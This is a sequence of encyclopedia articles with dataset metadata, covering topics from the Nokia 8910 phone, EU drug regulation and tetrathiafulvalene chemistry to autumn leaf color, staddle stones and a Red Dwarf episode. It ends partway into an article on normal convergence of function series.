[ "Spacetime", "Philosophy of time", "Physical quantities", "Time" ]
7,453,965
https://en.wikipedia.org/wiki/Nokia%208910
The Nokia 8910 is a mobile phone released in 2002 by Nokia. Part of the luxury 8xxx series, it was introduced as a successor to the Nokia 8850/8890. It has a white backlight and features Bluetooth connectivity. It was succeeded by the Nokia 8910i, which was released in 2003. See also Vertu References Mobile phones introduced in 2002 8910 Mobile phones with infrared transmitter Slider phones
Nokia 8910
[ "Technology" ]
90
[ "Mobile technology stubs", "Mobile phone stubs" ]
7,454,086
https://en.wikipedia.org/wiki/EudraLex
EudraLex is the collection of rules and regulations governing medicinal products in the European Union. Volumes EudraLex consists of 10 volumes: Concerning Medicinal Products for Human use: Volume 1 - Pharmaceutical Legislation. Volume 2 - Notice to Applicants. Volume 2A deals with procedures for marketing authorisation. Volume 2B deals with the presentation and content of the application dossier. Volume 2C deals with Guidelines. Volume 3 - Guidelines. Concerning Medicinal Products for human use in clinical trials (investigational medicinal products): Volume 10 - Clinical trials. Concerning Veterinary Medicinal Products: Volume 5 - Pharmaceutical Legislation. Volume 6 - Notice to Applicants. Volume 7 - Guidelines. Volume 8 - Maximum residue limits. Concerning Medicinal Products for Human and Veterinary use: Volume 4 - Good Manufacturing Practices. Volume 9 - Pharmacovigilance. Miscellaneous: Guidelines on Good Distribution Practice of Medicinal Products for Human Use (94/C 63/03) Directives Directive 65/65/EEC requires prior approval for the marketing of proprietary medicinal products. Directive 75/318/EEC clarifies the requirements of Directive 65/65/EEC and requires member states to enforce them. Directive 75/319/EEC requires marketing authorization requests to be drawn up only by qualified experts. Directive 93/41/EEC establishes the European Agency for the Evaluation of Medicinal Products. Directive 2001/20/EC defines rules for the conduct of clinical trials. Directive 2001/83/EC Directive 2005/28/EC defines Good Clinical Practice for the design and conduct of clinical trials. See also European Union law European Union directive European Commission Directorate-General EUR-Lex Regulation of therapeutic goods International Conference on Harmonisation of Technical Requirements for Registration of Pharmaceuticals for Human Use Good clinical practice European Medicines Agency EUDRANET EudraVigilance Title 21 of the Code of Federal Regulations (USA) Drug development References EudraLex, The Rules Governing Medicinal Products in the European Union, European Communities Commission, Directorate-General for Industry, Pharmaceuticals and Cosmetics. Vol. 1: Pharmaceutical legislation: medicinal products for human use. Vol. 2: Notice to applicants: medicinal products for human use. Vol. 3: Guidelines: medicinal products for human use. Vol. 4: Good manufacturing practices: medicinal products for human and veterinary use. Vol. 5: Pharmaceutical legislation: veterinary medicinal products. Vol. 6: Notice to applicants: veterinary medicinal products. Vol. 7: Guidelines: veterinary medicinal products. Markus Hartmann and Florence Hartmann-Vareilles, The Clinical Trials Directive: How Is It Affecting Europe's Noncommercial Research?, PLoS Clin Trials. 2006 June; 1(2): e13 External links News on Pharmaceuticals (European Union) EudraLex EUR-Lex Review of pharmaceutical legislation (EU DG Enterprise and Industry) Directorate General Enterprise and Industry (European Commission) European Union health policy European Union law Pharmaceuticals policy National agencies for drug regulation
EudraLex
[ "Chemistry" ]
607
[ "National agencies for drug regulation", "Drug safety" ]
7,454,236
https://en.wikipedia.org/wiki/Tetrathiafulvalene
Tetrathiafulvalene (TTF) is an organosulfur compound with the formula C6H4S4. Studies on this heterocyclic compound contributed to the development of molecular electronics. TTF is related to the hydrocarbon fulvalene, C10H8, by replacement of four CH groups with sulfur atoms. Over 10,000 scientific publications discuss TTF and its derivatives. Preparation The high level of interest in TTFs has spawned the development of many syntheses of TTF and its analogues. Most preparations entail the coupling of cyclic building blocks such as 1,3-dithiole-2-thiones or the related 1,3-dithiole-2-ones. For TTF itself, the synthesis begins with the cyclic trithiocarbonate (1,3-dithiole-2-thione), which is S-methylated and then reduced to give the 1,3-dithiol-2-yl methyl thioether; treatment with acid and then base couples two of these dithiole rings to give TTF. Redox properties Bulk TTF itself has unremarkable electrical properties. Distinctive properties are, however, associated with salts of its oxidized derivatives, such as salts derived from the radical cation [TTF]•+. The high electrical conductivity of TTF salts can be attributed to the following features of TTF: its planarity, which allows π-π stacking of its oxidized derivatives; its high symmetry, which promotes charge delocalization, thereby minimizing coulombic repulsions; and its ability to undergo oxidation at mild potentials to give a stable radical cation. Electrochemical measurements show that TTF can be oxidized twice reversibly: TTF ⇌ [TTF]•+ + e− (E = 0.34 V) [TTF]•+ ⇌ [TTF]2+ + e− (E = 0.78 V, vs. Ag/AgCl in solution) Each dithiolylidene ring in TTF has 7 π electrons: 2 for each sulfur atom, 1 for each sp2 carbon atom. Thus, oxidation converts each ring to an aromatic 6π-electron configuration, consequently leaving the central double bond essentially a single bond, as all π-electrons occupy ring orbitals. History An early salt of TTF was reported to be a semiconductor in 1972. Subsequently, the charge-transfer salt [TTF]TCNQ was shown to be a narrow band gap semiconductor. X-ray diffraction studies of [TTF][TCNQ] revealed stacks of partially oxidized TTF molecules adjacent to anionic stacks of TCNQ molecules. This "segregated stack" motif was unexpected and is responsible for the distinctive electrical properties, i.e. high and anisotropic electrical conductivity. Since these early discoveries, numerous analogues of TTF have been prepared. Well-studied analogues include tetramethyltetrathiafulvalene (Me4TTF), tetramethyltetraselenafulvalene (TMTSF), and bis(ethylenedithio)tetrathiafulvalene (BEDT-TTF, CAS [66946-48-3]). Several tetramethyltetrathiafulvalene salts (called Fabre salts) are of some relevance as organic superconductors. See also Bechgaard salt References Further reading Physical properties of Tetrathiafulvalene from the literature. Molecular electronics Organic semiconductors Dithioles
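As a worked illustration of the two reversible oxidations quoted in the redox properties section above, the 0.44 V separation between the two potentials implies that the radical cation is thermodynamically stable with respect to disproportionation. A short Python sketch of that standard Nernst-style arithmetic, using only the potentials quoted above:

```python
import math

# Disproportionation 2 [TTF]+ <=> TTF + [TTF]2+ at 25 degC, using the two
# reversible potentials quoted above (E1 = 0.34 V, E2 = 0.78 V vs. Ag/AgCl).
# Standard relation: log10 K_disp = -(E2 - E1) / (R*T*ln(10)/F).
R, T, F = 8.314, 298.15, 96485.0
E1, E2 = 0.34, 0.78

nernst_slope = R * T * math.log(10) / F     # about 0.0592 V per decade
log_K_disp = -(E2 - E1) / nernst_slope
print(f"log10 K_disp = {log_K_disp:.1f}")   # about -7.4: radical cation is stable
```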
Tetrathiafulvalene
[ "Chemistry", "Materials_science" ]
690
[ "Molecular physics", "Semiconductor materials", "Molecular electronics", "Nanotechnology", "Organic semiconductors" ]
7,454,377
https://en.wikipedia.org/wiki/Pharmaceutical%20Inspection%20Convention%20and%20Pharmaceutical%20Inspection%20Co-operation%20Scheme
The Pharmaceutical Inspection Convention and Pharmaceutical Inspection Co-operation Scheme (PIC/S) are two international instruments between countries and pharmaceutical inspection authorities. PIC/S is meant as an instrument to improve co-operation in the field of Good Manufacturing Practices between regulatory authorities and the pharmaceutical industry. History The PIC (Pharmaceutical Inspection Convention) was founded in October 1970 by the European Free Trade Association (EFTA), under the title of the Convention for the Mutual Recognition of Inspections in Respect of the Manufacture of Pharmaceutical Products. The initial members comprised the 10 member countries of EFTA at that time. In the early 1990s it was realized that, because of an incompatibility between the Convention and European law, it was not possible for new countries to be admitted as members of PIC: European law did not permit individual EU countries that were members of PIC to sign agreements with other countries seeking to join PIC. As a consequence, the Pharmaceutical Inspection Co-operation Scheme was formed on 2 November 1995. The Pharmaceutical Inspection Co-operation Scheme is an informal agreement between health authorities rather than a formal treaty between countries. PIC and the PIC Scheme, which operate together in parallel, are jointly referred to as PIC/S. PIC/S became operational in November 1995. From its inception until 2003, PIC/S did not have a distinct legal identity; its Secretariat was provided by the European Free Trade Association. At its meeting in June 2003, the PIC/S Committee decided to constitute PIC/S as a Swiss association in accordance with article 60 of the Swiss Civil Code, the same basis used by other internationally active organizations established in Switzerland, such as the International Committee of the Red Cross (ICRC). On 1 January 2004, PIC/S established its own Secretariat in Geneva, Switzerland. Purpose PIC/S has a number of provisions intended to establish the following: Mutual recognition of inspections between member countries, so that an inspection carried out by officials of one member country will be recognized as valid by other members. Equivalent principles of inspection methodology, so that it is understood that inspectors in each member country will be following the same best practices when carrying out inspections. Mechanisms for the training of inspectors. Harmonization of written standards of Good Manufacturing Practices. Lines of communication between member country inspectors/inspectorates. Members The following are the state members of PIC/S as of October 2021: See also GxP Good automated manufacturing practice (GAMP) Corrective and preventive action (CAPA) Validation (drug manufacture) European Medicines Agency (EMEA) European Federation of Pharmaceutical Industries and Associations (EFPIA) Pharmaceutical Research and Manufacturers of America (PhRMA) References External links European Federation of Pharmaceutical Industries and Associations (EFPIA) Japan Pharmaceutical Manufacturers Association (JPMA) Pharmaceutical Research and Manufacturers of America (PhRMA) Pharmaceutical industry Pharmaceuticals policy Intergovernmental organizations established by treaty International organisations based in Switzerland
Pharmaceutical Inspection Convention and Pharmaceutical Inspection Co-operation Scheme
[ "Chemistry", "Biology" ]
573
[ "Pharmacology", "Life sciences industry", "Pharmaceutical industry", "Medicinal chemistry stubs", "Pharmacology stubs" ]
7,454,381
https://en.wikipedia.org/wiki/Alikhan%20Bukeikhanov
Alikhan Nurmukhameduly Bukeikhan (5 March 1866 – 27 September 1937) was a Kazakh politician and publisher who served as the Chairman (Prime Minister) of the Kazakh Provisional National Government of Alash Orda and was one of the leaders of the Alash party from late 1917 to 1920. Early life Alikhan Bukeikhanov was born into a Kazakh Muslim family on 5 March 1866, in Tokyrauyn Volost, Russian Empire. He was the son of Nurmuhammed Bukeikhanov and, as a great-grandson of Barak Sultan, a former khan of the Orta zhuz, a direct descendant of Genghis Khan. Bukeikhanov graduated from the Russian-Kazakh School and Omsk Technical School in 1890. He later studied at the Saint Petersburg Forestry Institute, where he graduated from the Faculty of Economics in 1894. Bukeikhanov is believed to have been influenced by socialists during his youth. Upon graduating, Bukeikhanov returned to Omsk and spent the next fourteen years working there. From 1895 to 1897, he worked as a math teacher in the Omsk school for Kazakh children. Bukeikhanov was a participant in the 1896 Shcherbina Expedition, which aimed to research and assess virtually every aspect of Russian Central Asia, from its environment and resources to the culture and traditions of its inhabitants. This was the first of a few similar missions that he accepted. Among his recorded contributions was "Ovtsevodstvo v stepnom krae" ("Sheep-Breeding in the Steppe Land"), which analyzed animal husbandry in Central Asia. Bukeikhanov was the first biographer of Abay Kunanbayev, publishing an obituary in Semipalatinsky listok in 1905. In 1909, he published a collection of Kunanbayev's works. Political life In 1905, Bukeikhanov's political activism began when he joined the Constitutional Democratic Party. In late 1905, at the Uralsk Oblast Party Congress, he tried to create a Kazakh Democratic party but failed. As a result of this action, he was arrested and prohibited from living in the Steppe Oblasts. During his exile, he relocated to Samara. He was elected to the State Duma of the Russian Empire as a member of that party in 1906 and signed the Vyborg petition to protest the dissolution of the Duma by the tsar. In 1908, he was arrested again and exiled in Samara until 1917. While in Samara, he participated in the Samara Guberniya Committee of the People's Freedom Party, set up in 1915. Author of the idea of the First Kazakh Republic In April 1917, Bukeikhanov, Akhmet Baitursynov and several other native political figures took the initiative to convene an All-Kazakh Congress in Orenburg. In its resolution, the Congress urged the return to the native population of all the lands confiscated from it by the previous regime and the expulsion of all the new settlers from the Kazakh-Kirghiz territories. Other resolutions demanded the transfer of the local schools into native hands and the termination of the recruitment introduced in 1916. Within the group, Bukeikhanov, along with Russian liberals, chiefly the Kadets, sought to direct attention first to economic problems, whereas others sought to unite the Kazakhs with the other Turkic peoples of Russia. Three months later, another Kazakh-Kirghiz Congress met in Orenburg. There, for the first time, the idea of territorial autonomy emerged, and a national Kazakh-Kirghiz political party was formed, the Alash Autonomy. Before the February Revolution, Bukeikhanov collaborated with the Kadets in the hope of getting autonomous status for Kazakhs and contacted the head of the Russian Provisional Government, Alexander Kerensky.
Kerensky proceeded to make Bukeikhanov a commissar: on 19 March 1917, he was appointed the Provisional Government's commissioner for Turgay Oblast. After the October Revolution, he was elected in 1917 as president of the Alash Orda government of the Alash Autonomy. In 1920, after the establishment of Soviet hegemony, Bukeikhanov joined the Bolshevik party and returned to scientific life. His earlier political activities caused the authorities to view him with suspicion, leading to arrests in 1926 and 1928. In 1926, Bukeikhanov was arrested on the charge of counter-revolutionary activity and imprisoned in Butyrka prison in Moscow, but he was released for lack of evidence in the criminal case against him. In 1930, the authorities banished him to Moscow, where he was arrested a final time in 1937 and executed. It was not until 1989 that the Soviet authorities rehabilitated him. Writings Bukeikhanov's major political publication was "Kirgizy" ("The Kazakhs") (1910), which was published in the Constitutional Democratic party's book on nationalities edited by A. I. Kosteliansky. Bukeikhanov's other activities of this period included assisting in the creation of Qazaq, a Kazakh-language newspaper, and writing articles for newspapers, including "Dala Walayatynyng Gazeti" (Omsk), "Orenburgskii Listok", "Semipalatinskii Listok", "Turkestanskie Vedomosti" (Tashkent), "Stepnoi Pioner" (Omsk), and "Sary-Arqa" (Semipalatinsk). He was also a contributor to Ay Qap and "Sibirskie Voprosy". Explanatory notes References Sources External links The Geography of Civilizations: A Spatial Analysis of the Kazakh Intelligentsia's activities, From the Mid-Nineteenth to the Early Twentieth Century 1866 births 1937 deaths Kazakh writers from the Russian Empire 19th-century writers from the Russian Empire People from Karaganda Region People from Semipalatinsk Oblast Russian Constitutional Democratic Party members Members of the 1st State Duma of the Russian Empire Environmental scientists Kazakh-language writers Kazakhstani scientists Members of the Grand Orient of Russia's Peoples Saint-Petersburg State Forestry University alumni Executed politicians Great Purge victims from Kazakhstan Alash Autonomy Muslims from the Russian Empire Inmates of Butyrka prison
Alikhan Bukeikhanov
[ "Environmental_science" ]
1,280
[ "Environmental scientists" ]
7,454,563
https://en.wikipedia.org/wiki/Autumn%20leaf%20color
Autumn leaf color is a phenomenon that affects the normally green leaves of many deciduous trees and shrubs, by which they take on, during a few weeks in the autumn season, various shades of yellow, orange, red, purple, and brown. The phenomenon is commonly called autumn colours or autumn foliage in British English and fall colors, fall foliage, or simply foliage in American English. In some areas of Canada and the United States, "leaf peeping" tourism is a major contributor to economic activity. This tourist activity occurs between the beginning of color changes and the onset of leaf fall, usually around September to November in the Northern Hemisphere and March to May in the Southern Hemisphere. Chlorophyll and the green/yellow/orange colors A green leaf is green because of the presence of a pigment known as chlorophyll, which is inside an organelle called a chloroplast. When abundant in the leaf's cells, as during the growing season, the chlorophyll's green color dominates and masks out the colors of any other pigments that may be present in the leaf. Thus, the leaves of summer are characteristically green. Chlorophyll has a vital function: it captures solar rays and uses the resulting energy to manufacture the plant's food, simple sugars produced from water and carbon dioxide. These sugars are the basis of the plant's nourishment, the sole source of the carbohydrates needed for growth and development. In this food-manufacturing process the chlorophylls break down and thus are continually "used up". During the growing season, however, the plant replenishes the chlorophyll so that the supply remains high and the leaves stay green. In late summer, with daylight hours shortening and temperatures cooling, the veins that carry fluids into and out of the leaf are gradually closed off as a layer of special cork cells forms at the base of each leaf. As this cork layer develops, water and mineral intake into the leaf is reduced, slowly at first, and then more rapidly. During this time, the amount of chlorophyll in the leaf begins to decrease. Often, the veins are still green after the tissues between them have almost completely changed color. Chlorophyll is located in the thylakoid membrane of the chloroplast and is composed of an apoprotein along with several ligands, the most important of which are chlorophylls a and b. In the autumn, this complex is broken down. Chlorophyll degradation is thought to occur first. Research suggests that the beginning of chlorophyll degradation is catalyzed by chlorophyll b reductase, which reduces chlorophyll b to 7-hydroxymethyl chlorophyll a, which is then reduced to chlorophyll a. This is believed to destabilize the complex, at which point breakdown of the apoprotein occurs. An important enzyme in the breakdown of the apoprotein is FtsH6, which belongs to the FtsH family of proteases. Chlorophylls degrade into colorless tetrapyrroles known as nonfluorescent chlorophyll catabolites. As the chlorophylls degrade, the hidden pigments of yellow xanthophylls and orange beta-carotene are revealed. Pigments that contribute to other colors Carotenoids Carotenoids are present in the leaves throughout the year, but their orange-yellow colors are usually masked by green chlorophyll. As autumn approaches, certain influences both inside and outside the plant cause the chlorophylls to be replaced at a slower rate than they are being used up.
During this period, with the total supply of chlorophylls gradually dwindling, the "masking" effect slowly fades away. Then other pigments present (along with the chlorophylls) in the leaf's cells begin to show through. These are carotenoids, and they provide colorations of yellow, brown, orange, and the many hues in between. The carotenoids occur, along with the chlorophyll pigments, in tiny structures called plastids within the cells of leaves. Sometimes they are in such abundance in the leaf that they give a plant a yellow-green color, even during the summer. Usually, however, they become prominent for the first time in autumn, when the leaves begin to lose their chlorophyll. Carotenoids are common in many living things, giving characteristic color to carrots, corn, canaries, and daffodils, as well as egg yolks, rutabagas, buttercups, and bananas. Their brilliant yellows and oranges tint the leaves of such hardwood species as hickories, ash, maple, yellow poplar, aspen, birch, black cherry, sycamore, cottonwood, sassafras, and alder. Carotenoids are the dominant pigment in the coloration of about 15–30% of tree species. Anthocyanins The reds, the purples, and their blended combinations that decorate autumn foliage come from another group of pigments in the cells called anthocyanins. Unlike the carotenoids, these pigments are not present in the leaf throughout the growing season, but are actively produced towards the end of summer. They develop in late summer in the sap of the cells of the leaf, and this development is the result of complex interactions of many influences both inside and outside the plant. Their formation depends on the breakdown of sugars in the presence of bright light as the level of phosphate in the leaf is reduced. During the summer growing season, phosphate is at a high level. It has a vital role in the breakdown of the sugars manufactured by chlorophyll, but in autumn, phosphate, along with the other chemicals and nutrients, moves out of the leaf into the stem of the plant. When this happens, the sugar-breakdown process changes, leading to the production of anthocyanin pigments. The brighter the light during this period, the greater the production of anthocyanins and the more brilliant the resulting color display. When the days of autumn are bright and cool, and the nights are chilly but not freezing, the brightest colorations usually develop. Anthocyanins temporarily color the edges of some of the very young leaves as they unfold from the buds in early spring. They also give the familiar color to such common fruits as cranberries, red apples, blueberries, cherries, strawberries, and plums. Anthocyanins are present in about 10% of tree species in temperate regions, although in certain areas, most famously northern New England, up to 70% of tree species may produce the pigment. In autumn forests, they appear vivid in the maples, oaks, sourwood, sweetgums, dogwoods, tupelos, cherry trees, and persimmons. These same pigments often combine with the carotenoids' colors to create the deeper orange, fiery reds, and bronzes typical of many hardwood species.
Function of autumn colors Deciduous plants were traditionally believed to shed their leaves in autumn primarily because the high costs of maintaining them would outweigh the benefits from photosynthesis during the winter period of low light availability and cold temperatures. In many cases this turned out to be oversimplistic: other factors are involved, including insect predation, water loss, and damage from high winds or snowfall. Anthocyanins, responsible for red-purple coloration, are actively produced in autumn but are not involved in leaf-drop. A number of hypotheses on the role of pigment production in leaf-drop have been proposed, and they generally fall into two categories: interaction with animals, and protection from nonbiological factors. Photoprotection According to the photoprotection theory, anthocyanins protect the leaf against the harmful effects of light at low temperatures. The leaves are about to fall, so protection is not of extreme importance for the tree. Photo-oxidation and photoinhibition, however, especially at low temperatures, make the process of reabsorbing nutrients less efficient. By shielding the leaf with anthocyanins, according to the photoprotection theory, the tree manages to reabsorb nutrients (especially nitrogen) more efficiently. Coevolution According to the coevolution theory, the colors are warning signals to insects, such as aphids, that use trees as a host for the winter. If the colors are linked to the amount of chemical defenses against insects, then the insects will avoid red leaves and increase their fitness; at the same time, trees with red leaves have an advantage because they reduce their parasite load. This has been shown in the case of apple trees, where some domesticated apple varieties, unlike wild ones, lack red leaves in the autumn. A greater proportion of aphids that avoid apple trees with red leaves manage to grow and develop compared to those that do not. A trade-off, moreover, exists between fruit size, leaf color, and aphid resistance, as varieties with red leaves have smaller fruits, suggesting that the production of red leaves carries a cost linked to a greater need to reduce aphid infestation. Consistent with red-leaved trees providing reduced survival for aphids, tree species with bright leaves tend to select for more specialist aphid pests than do trees lacking bright leaves (autumn colors are useful only in those species coevolving with insect pests in autumn). One study found that maple trees subjected to simulated insect herbivory (leaf-eating damage) showed earlier red coloration than trees that were not damaged. The coevolution theory of autumn colors was proposed by W. D. Hamilton in 2001 as an example of evolutionary signalling theory. Biological signals such as red leaves, it is argued, are usually honest because they are costly to produce: they signal the true quality of the signaller, since low-quality individuals are unable to fake them and cheat. Autumn colors would be a signal if they were costly to produce, or impossible to fake (for example, if autumn pigments were produced by the same biochemical pathway that produces the chemical defenses against the insects). The change of leaf colors prior to fall has also been suggested as an adaptation that may help to undermine the camouflage of herbivores. Many plants with berries attract birds with especially visible berry and/or leaf color, particularly bright red.
The birds get a meal, while the shrub, vine, or typically small tree gets undigested seeds carried off and deposited with the birds' manure. Poison ivy is particularly notable for having bright-red foliage that draws birds to its off-white seeds (which are edible for birds, but not for most mammals). Allelopathy The brilliant red autumn color of some species of maple is created by processes separate from those in chlorophyll breakdown. Even while struggling to cope with the energy demands of a changing and challenging season, maple trees make an additional metabolic expenditure to create anthocyanins. These anthocyanins, which create the visual red hues, have been found to aid in interspecific competition by stunting the growth of nearby saplings (allelopathy). Tourism Although some autumn coloration occurs wherever deciduous trees are found, the most brightly colored autumn foliage is found in the northern hemisphere, including most of southern mainland Canada, some areas of the northern United States, Northern and Western Europe, Northern Italy, the Caucasus region of Russia near the Black Sea, and Eastern Asia (including much of northern and eastern China, as well as Korea and Japan). In the southern hemisphere, colorful autumn foliage can be observed in southern and central Argentina, the south and southeast regions of Brazil, eastern and southeastern Australia (including South Australia and Tasmania), and most of New Zealand, particularly the South Island. Climate influences Compared to Western Europe (excluding Southern Europe), North America provides many more tree species (more than 800 species and about 70 oaks, compared to 51 and three, respectively, in Western Europe), which adds many more different colors to the spectacle. The main reason is the differing effect of the ice ages: in North America, species were protected in more southern regions along north–south ranging mountains, whereas this was not the case in much of Europe. Global warming and rising carbon dioxide levels in the atmosphere may delay the usual autumn spectacle of changing colors and falling leaves in northern hardwood forests in the future, and increase forest productivity. Specifically, higher autumn temperatures in the Northeastern United States are delaying the color change. Experiments with poplar trees showed that they stayed greener longer with higher CO2 levels, independent of temperature changes; however, the experiments, run over two years, were too brief to indicate how mature forests may be affected over time. Other studies using 150 years of herbarium specimens found more than a one-month delay in the onset of autumn since the 19th century, and found that insect, viral, and drought stress can also affect the timing of fall coloration in maple trees. Also, other factors, such as increasing ozone levels close to the ground (tropospheric ozone pollution), can negate the beneficial effects of elevated carbon dioxide. References Notes Further reading External links Autumnal tints by Henry David Thoreau Identifying Common trees in Autumn by their colors Leaf songs Leaf morphology Plant physiology Pigmentation
Autumn leaf color
[ "Biology" ]
2,866
[ "Plant physiology", "Pigmentation", "Plants" ]
7,454,585
https://en.wikipedia.org/wiki/Epideme
"Epideme" is the seventh episode of science fiction comedy series Red Dwarf VII and the 43rd in the series run. It was first broadcast on the British television channel BBC2 on 28 February 1997. Written by Paul Alexander and Doug Naylor, and directed by Ed Bye, the episode involves Lister contracting an intelligent, but deadly, virus. Plot The crew encounters an abandoned ship, the Leviathan, which is buried in the middle of an ice planetoid. In it, they find the frozen body of Caroline Carmen, one of Lister's former crushes. She is taken on board the Starbug, where the crew attempts to thaw her out, but they are unable to melt the ice. That night, Carmen defrosts of her own accord and turns out to be in an advanced state of decomposition. She attacks Lister and spits part of her jaw and tongue down his throat, infecting him with Epideme, an intelligent virus (with an annoying personality) that was supposed to cure nicotine addiction, but in practice kills its victims within 48 hours, then reanimates their corpse to find a new victim to transfer itself to. Lister tries reasoning with Epideme directly through a communication link, but has no luck in convincing the virus to leave. Kochanski comes up with a drastic plan to save Lister's life: coax the virus to move down toward Lister's hand and then cut off the hand, isolating the virus outside his body. However, they end up cutting off Lister's right arm instead of the left one as he had requested, and they only manage to dispose of part of the Epideme virus, with the result that they only succeed in prolonging Lister's life by an hour. Lister sneaks aboard the Leviathan with some explosives, intending to kill both himself and Epideme, but the virus talks him out of it by revealing that the destination of the Leviathan was Delta VII, a research base that might have a cure. When Starbug arrives at Delta VII, it turns out that the planet has been destroyed in order to deal with a massive Epideme outbreak – a fact that the virus was fully aware of, and used in its attempt to prevent Lister from killing himself. With Lister on the verge of death, Kochanski injects Lister with a drug that stops his heart, then gets his corpse to bite her left hand, infecting it. After amputating her left arm she reveals that it was actually Caroline Carmen's arm, and that her own left arm is intact. Kryten and Kochanski then revive the now virus-free but now one-armed Lister. Production For Paul Alexander's second script, he used an old Jasper Carrott joke for the premise of the plot – "What if your flu could talk to you? Wouldn't it just say that it was doing its job?" Again, Naylor helped out with the script, tweaking it to conform to the Red Dwarf universe. An alternate ending was scripted and filmed for the episode – involving the dead arm, containing the Epideme virus, flying through space and then towards the camera – but it was decided to end the episode just before this scene. Of the many new props needed for the new series was a laser bone-saw – used for the scenes of severing the Epideme-infected arm. For the scene, Chloë Annett had taken several attempts to cut the arm off. Voice artist Gary Martin played the talking virus Epideme. He was recommended by Danny John-Jules, his friend of many years' standing, and had even been with Danny when he auditioned for the role of the Cat in the mid-eighties. Nicky Leatherbarrow also appeared, in heavy make-up, as Caroline Carmen – the initial carrier of the Epideme virus. 
Reception Originally broadcast on the British television channel BBC2 on 28 February 1997 in the 9:00 pm evening slot, this episode's television ratings were high. Although Series VII as a whole received a mixed response from fans and critics alike, this was considered one of the better episodes. DVDActive thought the episode was "a nice idea, and one that is well-executed ... the final scene is one of the funniest of the series." DVD Verdict thought that this episode was the first in which the character of Kochanski finally "reached her stride" after all the "attitude and aggravation during those first few shows". Sci-Fi Online noted that the episode was "particularly reminiscent of Confidence and Paranoia, since it deals with a talking disease." References External links Series VII episode guide at www.reddwarf.co.uk Red Dwarf VII episodes 1997 British television episodes Fictional viruses Fictional microorganisms
Epideme
[ "Biology" ]
983
[ "Fictional microorganisms", "Microorganisms", "Fictional viruses", "Viruses" ]
7,454,916
https://en.wikipedia.org/wiki/Staddle%20stones
Staddle stones, or steddle stones, were originally used as supporting bases for granaries, hayricks, game larders, etc. The staddle stones lifted the granaries above the ground, thereby protecting the stored grain from vermin and water seepage. In Middle English staddle, or stadle, is stathel, from Old English stathol, a foundation, support or trunk of a tree. They can mainly be found in Great Britain, Norway ("stabbur"), and Galicia and Asturias (Northern Spain).

Origins

The name itself, and evidence from surviving vernacular buildings with wooden 'feet', suggest that at first the staddles or supports were made of wood, such as at Peper Harow granary in Surrey. Stone staddles were longer lasting and a more reliable means of supporting structures which were sometimes of considerable weight. The name has become integrated into the landscape, with bridges, houses, farms and other structures incorporating the name 'staddle'.

Design

The staddle stones usually had a separate head and base, which gave the whole structure a 'mushroom'-like appearance. Different areas in the United Kingdom had different designs. The base varied from cylindrical to tapered rectangular to near triangular. Flat-topped cone-shaped staddle stones are to be found in parts of the Isle of Wight. The tops are flat to support the beams; however, some variation exists, such as square tops, fluted designs, slate tops, etc. A fine example is the English granary built in 1731, supported on staddle stones, which can be seen in the Weald and Downland Open Air Museum in West Sussex. Such structures were common in southern England in the 18th century. At Higher Farm in Heathfield, Tavistock, staddle stones are part of the substantial barns built by the Duke of Bedford in the 19th century. The dressed granite stone bases have specially hewn slate tops. The materials used depended on the stone available, giving rise to sandstone, red sandstone and granite examples, among others. The tower mill at Reigate on the Wray Common ceased to work in 1895. The mill had a granary standing next to it, supported by a large number of staddle stones. The Museum of Scottish Country Life at Wester Kittochside near East Kilbride has two 'stathels', made in Edinburgh of cast iron. The structure is basically a cast-iron version of a set of staddle stones with its wooden framework. These rare survivals are still in use.

Function

The base stones taper towards the top, with an overlapping cap stone placed above, making it almost impossible for a rodent to climb up and into the hay or grain stored above. The air could freely circulate beneath the stored crops, and this helped to keep them dry. A wood framework was placed onto the tops of the stones, the staddles being arranged in two or three rows, giving sixteen or more stones. The hayricks, tithe barns, granaries, etc. were built on top of this frame.

Granaries and beehives

Granaries were often constructed with wooden weather-boards, such as at Blaxland Farm in Sturry, Kent, which has nine staddles. However, if the grain was stored loose, then the sides were filled in with brick nogging and light lath-and-plaster at the wall tops. Wooden steps up to the buildings were detachable and stored by hanging them up on the side of the structure. If stone or brick steps were built, then the top step was omitted, thus denying access to rats and other vermin. Some of these granaries had a 'cat flap' and others had a recess inside the steps which served as a dog kennel.
Most granaries were used for the storage of two or three separate crops, having a capacity of 500 to 2500 bushels. The arrangement of the stones to support the structure and its weight when in use required nine, twelve or sixteen staddles. The production of staddles was therefore a fairly significant local industry. Small granaries could make do with five, one being in the middle. The Upper Hexford granary in Oxfordshire uses thirty-six staddles. Beehives were often set on top of staddle stones to keep out predators and provide dry and airy conditions.

Game larders

Small staddle stones were used to support small, roofed, box-shaped game larders, which were used on the larger estates for storage of game, such as pheasant, brought back by shooting parties.

Barns

Timber-framed barns raised onto staddle stones were sometimes found in the south of England. Apart from the usual benefits, there seems to be some correlation between this barn type and the builder being a tenant: being on staddles, such barns remained the property of the tenant. In Galicia and Asturias (NW Spain), these barns are called hórreos.

Landscape gardening

Staddles are often found in architectural salvage yards, as they may be seen as attractive structures. They are also sold new, being made from moulded concrete. Chainsaws are used to produce wooden 'staddle stones' for use as garden seats or ornaments. In this context the staddle stones are often called mushroom stones.

Conservation

Staddle stones are often well over a century old and have developed a good lichen 'patina', with slow- and fast-growing species adhering to the surfaces. They are best left uncleaned, as the lichen flora is well worth preserving to add to the biodiversity of a garden scene.

Surveyors' marks

Old land deeds in the northeastern United States often refer to an Oak Staddle or Walnut Staddle. These deeds date from the late 18th century to the mid-19th century. Either the owners would cut a tree, leaving the stump, and request that the surveyors measure to it, or the surveyor would measure out to the location of a new lot corner and a staddle would be inserted into the ground like a boundary stone.

See also
The Lands of Cunninghamhead. An example of the rare Scottish Staddle Stone.
Foundation (engineering)
Hórreo
Latte stone
Museum of Scottish Rural Life, Kittochside

Notes
References
External links
Staddle stones and Game Larders
Granary on Staddle Stone
Staddle Stones - Salvage Yards
Reproduction and Antique Staddle Stones
Large collection of staddle stone images
A Researcher's Guide to Local History terminology
Agricultural buildings
Building stone
Shallow foundations
Architectural elements
Mechanical pest control
Staddle stones
[ "Technology", "Engineering" ]
1,332
[ "Building engineering", "Architectural elements", "Components", "Architecture" ]
7,455,080
https://en.wikipedia.org/wiki/Normal%20convergence
In mathematics, normal convergence is a type of convergence for series of functions. Like absolute convergence, it has the useful property that it is preserved when the order of summation is changed.

History

The concept of normal convergence was first introduced by René Baire in 1908 in his book Leçons sur les théories générales de l'analyse.

Definition

Given a set S and functions f_n : S \to \mathbb{C} (or to any normed vector space), the series

\sum_{n} f_n

is called normally convergent if the series of uniform norms of the terms of the series converges, i.e.,

\sum_{n} \|f_n\| = \sum_{n} \sup_{x \in S} |f_n(x)| < \infty.

Distinctions

